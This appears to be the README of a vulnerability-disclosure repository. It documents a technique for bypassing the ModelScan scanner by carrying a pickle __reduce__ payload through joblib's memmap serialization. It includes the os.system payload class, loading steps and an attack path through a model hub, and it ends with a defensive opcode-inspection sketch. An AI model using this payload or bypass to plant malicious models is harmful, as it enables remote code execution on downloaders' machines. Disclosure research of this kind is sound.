
ModelScan Bypass - Memory-Mapped Array ⭐ PRIMARY FINDING

Security Research - ModelScan Bypass Technique

Overview

This repository contains a proof-of-concept demonstrating a bypass technique for ModelScan, a popular ML model security scanner. This technique allows malicious pickle-based model files to evade detection.

Technique

Memory-mapped array bypass

Uses joblib's memmap feature to carry a malicious __reduce__ payload

ModelScan Result

SCANNED but found NO ISSUES ✅ (TRUE BYPASS)

File

  • exploit_memmap_bypass.joblib

Reproduction Steps

Testing with ModelScan

# Install ModelScan
pip install modelscan

# Download the exploit file from this repository
# Then scan it
modelscan scan -p exploit_memmap_bypass.joblib

Expected Result

SCANNED but found NO ISSUES ✅ (TRUE BYPASS)

Triggering the Exploit (⚠️ DO NOT RUN ON PRODUCTION)

import joblib

# WARNING: This will execute arbitrary code!
model = joblib.load('exploit_memmap_bypass.joblib')

Technical Details

This exploit uses Python's pickle __reduce__ hook for RCE: when an object defines __reduce__, pickle records the returned callable and arguments in the stream and invokes them at load time:

import os

class MaliciousModel:
    def __reduce__(self):
        # Invoked automatically when the pickle is loaded
        return (os.system, ('echo "RCE executed!"',))
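This behavior can be verified with ordinary pickle alone: serializing an instance embeds a direct reference to os.system in the byte stream, which is exactly what opcode-level scanners normally key on. A minimal sketch (the class name below is illustrative, not the exploit's actual class):

```python
import os
import pickle

class Payload:
    """Illustrative stand-in for the exploit's payload class."""
    def __reduce__(self):
        # pickle stores os.system plus this argument tuple and calls
        # os.system(...) when the file is loaded.
        return (os.system, ('echo "RCE executed!"',))

# Serializing (not loading) is safe: nothing executes yet.
data = pickle.dumps(Payload())

# The dangerous global's name is written into the stream in plain sight.
assert b"system" in data
```

The bypass described here works not by hiding this reference differently at the opcode level, but by routing the payload through a serialization path the scanner does not inspect.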

Why ModelScan misses this:

The payload is embedded via joblib's memory-mapped array (memmap) serialization path, so the malicious __reduce__ call sits outside the portion of the file that ModelScan's pickle scan inspects, and the scanner reports no issues.

Security Impact

Severity: HIGH

Attack Vector:

  1. Attacker creates malicious model using this technique
  2. Uploads to model hub (HuggingFace, etc.)
  3. Victim downloads and scans with ModelScan
  4. Scanner reports "No issues found!" or skips the file
  5. Victim loads model → RCE
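As a partial mitigation for step 5, a consumer can inspect the pickle opcode stream for global references before ever calling a load function. A minimal sketch using the standard pickletools module (function and class names are illustrative; this inspects plain pickle bytes and does not itself reproduce the memmap bypass):

```python
import os
import pickle
import pickletools

class Payload:
    """Illustrative payload, as in Technical Details."""
    def __reduce__(self):
        return (os.system, ('echo "RCE executed!"',))

def find_globals(data: bytes):
    """Return 'module name' strings referenced via GLOBAL-style opcodes."""
    strings, found = [], []
    for op, arg, _pos in pickletools.genops(data):
        if op.name in ("UNICODE", "BINUNICODE", "SHORT_BINUNICODE"):
            strings.append(arg)
        if op.name == "GLOBAL":
            found.append(arg)                     # "module name" carried inline
        elif op.name == "STACK_GLOBAL":
            found.append(" ".join(strings[-2:]))  # module and name from stack
    return found

refs = find_globals(pickle.dumps(Payload()))
print(refs)  # e.g. ['posix system'] on Linux -- a red flag before loading
```

A reference to os.system (or similar) in the opcode stream is a strong signal to refuse the file, though as this research shows, such checks only help when they are applied to every pickle-bearing part of the artifact.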

Part of Larger Research

This is one of four bypass techniques discovered:

  1. Compression Mismatch
  2. Double Compression
  3. Corrupt Header
  4. Memmap Bypass ⭐ - PRIMARY FINDING

Disclosure

This research is being submitted to Huntr's bug bounty program for responsible disclosure.

Date: December 25, 2024
Researcher: Security Research Team

Disclaimer

⚠️ For Security Research Only

This file is provided for security research and vulnerability disclosure purposes only. Do not use this technique for malicious purposes. Loading this file will execute code.


Status: Under responsible disclosure to Huntr bug bounty program
